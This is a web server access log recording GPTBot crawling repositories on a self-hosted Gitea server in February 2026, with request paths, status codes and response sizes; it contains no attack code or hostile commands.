"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:14:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 12775] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" +[17/Feb/2026:14:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" +[17/Feb/2026:14:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:14:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 16073] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:14:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:14:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets" [Client 74.7.227.38] [Length 24755] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 11530] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" +[17/Feb/2026:14:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11961] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:14:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" [Client 74.7.227.38] [Length 11285] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:14:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14925] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:14:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 11802] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" +[17/Feb/2026:14:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" +[17/Feb/2026:14:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 10142] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" +[17/Feb/2026:14:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" +[17/Feb/2026:14:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23042] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" +[17/Feb/2026:14:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" [Client 74.7.227.38] [Length 9869] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" +[17/Feb/2026:14:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" +[17/Feb/2026:14:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" +[17/Feb/2026:14:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" +[17/Feb/2026:14:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" [Client 74.7.227.38] [Length 12477] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" +[17/Feb/2026:14:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" [Client 74.7.227.38] [Length 18812] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/mail_contact.py" +[17/Feb/2026:14:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 10713] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" +[17/Feb/2026:14:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" [Client 74.7.227.38] [Length 452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/launch.json" +[17/Feb/2026:14:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" +[17/Feb/2026:14:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15272] [Gzip 8.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" +[17/Feb/2026:14:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" +[17/Feb/2026:14:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31287] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38749] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33621] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23719] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10957] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35827] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33429] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" +[17/Feb/2026:14:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:14:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:14:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9934] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:14:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:14:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9936] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:14:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:14:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:14:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:14:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:14:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:14:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:14:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:14:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 